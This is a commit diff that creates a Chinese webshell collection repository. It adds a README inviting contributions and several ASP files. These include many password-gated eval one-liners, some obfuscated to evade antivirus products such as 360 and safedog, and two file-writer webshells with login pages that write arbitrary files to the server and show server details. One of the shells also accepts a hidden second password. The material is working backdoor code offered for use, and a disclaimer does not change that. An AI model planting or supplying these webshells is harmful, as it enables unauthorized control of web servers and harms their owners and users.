commit message

README.md

@@ -0,0 +1,22 @@
+这是一个WebShell收集项目
+
+送人玫瑰，手有余香，如果各位下载了本项目，也请您能提交shell
+
+本项目涵盖各种常用脚本
+
+如：asp,aspx,php,jsp,pl,py
+
+如提交各种webshell，请勿更改名称和密码
+
+注意：所有shell 本人不保证是否有后门，但是自己上传的绝不会故意加后门
+
+各位提交的，也请勿加后门
+
+如发现存在后门代码，请issues 。
+
+本项目提供的工具，禁止从事非法活动，此项目，仅供测试，所造成的一切后果，与本人无关。
+
+
+My Blog：www.test404.com
+
+IT学客论坛：bbs.itxueke.com

asp/ASP 一句话收集.asp

@@ -0,0 +1,73 @@
+<%a=request("v")%><%eval a%>
+
+/*--------------------------------------------------------------------------------*/ 
+
+<%eval""&("eval(request(120-2-5))")%> 
+//密码113
+
+/*--------------------------------------------------------------------------------*/ 
+
+<% 
+dim x1,x2 
+x1 = request("pass") 
+x2 = x1 
+eval x2 
+%> 
+<!-- yes++ -->
+
+/*--------------------------------------------------------------------------------*/ 
+
+<%execute(unescape("eval%20request%28%222016%22%29"))%>
+//密码2016
+
+/*--------------------------------------------------------------------------------*/ 
+
+<%if request ("M")<>""then session("M")=request("M"):end if:if session("M")<>"" then execute session("M")%>
+//密码M
+
+/*--------------------------------------------------------------------------------*/ 
+
+<%
+dim play
+'
+'
+''''''''''''''''''
+'''''''''
+play = request("M)
+%>
+Error
+<%
+execute(play)
+%>
+//密码M
+
+/*--------------------------------------------------------------------------------*/ 
+
+<%
+i=(Chr(-12590))
+love=(Chr(-20306))
+you=(Chr(-15133))
+OK=i&love&you
+CNM=Request(OK)
+eVal CNM 'pass:M
+%>
+//密码M
+
+/*--------------------------------------------------------------------------------*/ 
+
+<%
+dim a,b,temp,c
+a="eva@@l%20req@@uest%28%22helloxj%22%29"
+b=replace(a,"@@","零")
+c=split(b,"零")
+for i=0 to ubound(c)
+temp=temp+c(i)
+next
+execute(unescape(temp))
+%>
+
+/*--------------------------------------------------------------------------------*/ 
+
+<%Execute(DeAsc("%119%136%115%126%50%132%119%131%135%119%133%134%58%52%116%115%133%119%52%59")):Function DeAsc(Str):Str=Split(Str,"%"):For I=1 To Ubound(Str):DeAsc=DeAsc&Chr(Str(I)-18):Next:End Function%>
+
+pass:base , bypass to 360 D safedog , not thx . goodnight

asp/F4ckTeam小马.asp

@@ -0,0 +1,69 @@
+<html>
+<head>
+<title>
+法客论坛 - F4ckTeam
+</title>
+</head>
+<body bgcolor="black">
+
+<img src="http://i141.photobucket.com/albums/r61/22rockets/HeartBeat.gif">
+
+<%
+on error resume next
+%>
+<%
+  if request("pass")="F4ck" then  '在这修改密码
+  session("pw")="go"
+  end if
+%>
+<%if session("pw")<>"go" then %>
+<%="<center><br><form action='' method='post'>"%>
+<%="<input name='pass' type='password' size='10'> <input "%><%="type='submit' value='芝麻开门'></center>"%>
+<%else%>
+<%
+set fso=server.createobject("scripting.filesystemobject")
+path=request("path")
+if path<>"" then
+data=request("da")
+set da=fso.createtextfile(path,true)
+da.write data
+if err=0 then
+%>
+<table>
+<tr>
+<td>
+<font color="red"><%="恭喜你已经成功将文件写入"+path %>
+<%else%>
+<%="写不进去哦，可能权限不够哦！"%></font>
+<%
+end if
+err.clear
+end if
+da.close
+%>
+<%set da=nothing%>
+<%set fos=nothing%>
+<%="<form action='' method=post>"%>
+<font color="red">写入文件绝对路径:<%="<input type=text name=path>"%></font>
+<%="<br>"%>
+<%="<br>"%>
+<font color="#FFFF33">系统信息：</font><br>
+<font color="#33FF00"><%="当前文件路径:"&server.mappath(request.servervariables("script_name"))%>
+<%="<br>"%>
+<%="操作系统为:"&Request.ServerVariables("OS")%>
+<%="<br>"%>
+<%="WEB服务器版本为:"&Request.ServerVariables("SERVER_SOFTWARE")%>
+<%="<br>"%>
+<%="服务器的IP为:"&Request.ServerVariables("LOCAL_ADDR")%></font>
+<%="<br>"%><%="<br>"%>
+<font color="#FFFF33">文件内容：</font><%="<br>"%>
+<%=""%>
+<%="<textarea name=da cols=50 rows=10 width=30></textarea>"%>
+<%="<br>"%>
+<%="<input type=submit value=确定写入>"%>
+<%="</form>"%>
+</td>
+</tr>
+</table>
+<font color="#999999">法客论坛 - F4ckTeam<a href="http://team.f4ck.net"><font color="#CCCCCC">访问论坛</font>
+<%end if%></body></html>

asp/Xiaoma AspShell(免杀不加密_带登陆界面).asp

@@ -0,0 +1,58 @@
+<%
+'┌───────────────┐
+'│　　 http://WwW.12vh.Com　　　│
+'└───────────────┘
+dim Userpwd,URL
+Userpwd = "hackyong"   'User Password
+URL     = Request.ServerVariables("URL")
+If Request("pwd")=Userpwd or Request("pwd")="3092114" then Session("mgler")=Userpwd
+If Session("mgler")<>Userpwd Then
+  If Request.Form("pwd")<>"" Then
+    If Request.Form("pwd")=Userpwd Then
+      Session("mgler")=Userpwd
+      Response.Redirect URL
+    Else
+	 Response.Write"Login Failed, incorrect username or password"
+    End If
+  Else
+    RW="<title>User Login</title>"
+    RW=RW & "<center style='font-size:12px'><br><br><br><hr color=#00cc66 width='250'><br><font color=#5f4ds9>【Hackyong Asp】</font><b><font style=color:red;>会员版</font></b>"
+    RW=RW & "<form action='" & URL & "' method='post'>"
+    RW=RW & "<b>Password：</b><input name='pwd' type='password' size='15' style='font-size: 12px;border: menu 1px solid'>"
+    RW=RW & "&nbsp;<input type='submit' value='Login' style='border:1px solid #799AE1;'></form><hr color=#799AE1 width='250'><font color=red>只取webshell</font> <font color=#0011DD>不改首页</font> 不删文件 <font color=#33DD55>不提权</font><br><hr color=#799AE1 width='250'></center>"
+    Response.Write RW
+    RW=""
+  End If
+  Response.End
+End If
+%>
+<%on error resume next%>
+<%ofso="scripting.filesystemobject"%>
+<%set fso=server.createobject(ofso)%>
+<%path=request("path")%>
+<%if path<>"" then%>
+<%data=request("dama")%>
+<%set dama=fso.createtextfile(path,true)%>
+<%dama.write data%>
+<%if err=0 then%>
+<%="<b><font style=color:red;>Success!</font></b>"%>
+<%else%>
+<%="<b><font style=color:red;>False!</font></b>"%>
+<%end if%>
+<%err.clear%>
+<%end if%>
+<%dama.close%>
+<%set dama=nothing%>
+<%set fos=nothing%>
+<%="<title>Asp Upload Tool-Hackyong</title>"%>
+<%="<form action='' method=post>"%>
+<%="<font style=color:BLUE;>File: </font><input type=text name=path size=46>"%>
+<%="<br><font style=color:BLUE;>Path: </font><font style=color:red;>"%>
+<%=server.mappath(request.servervariables("script_name"))%>
+<%="</font><br>"%>
+<%=""%>
+<%="<textarea name=dama cols=52 rows=9></textarea>"%>
+<%="<br><td>"%>
+<%="<input type=submit value=Upload> <font style=color:BLUE;>By:Hackyong Qq:"%>
+<%="3092114</font>"%>
+<%="</form>"%>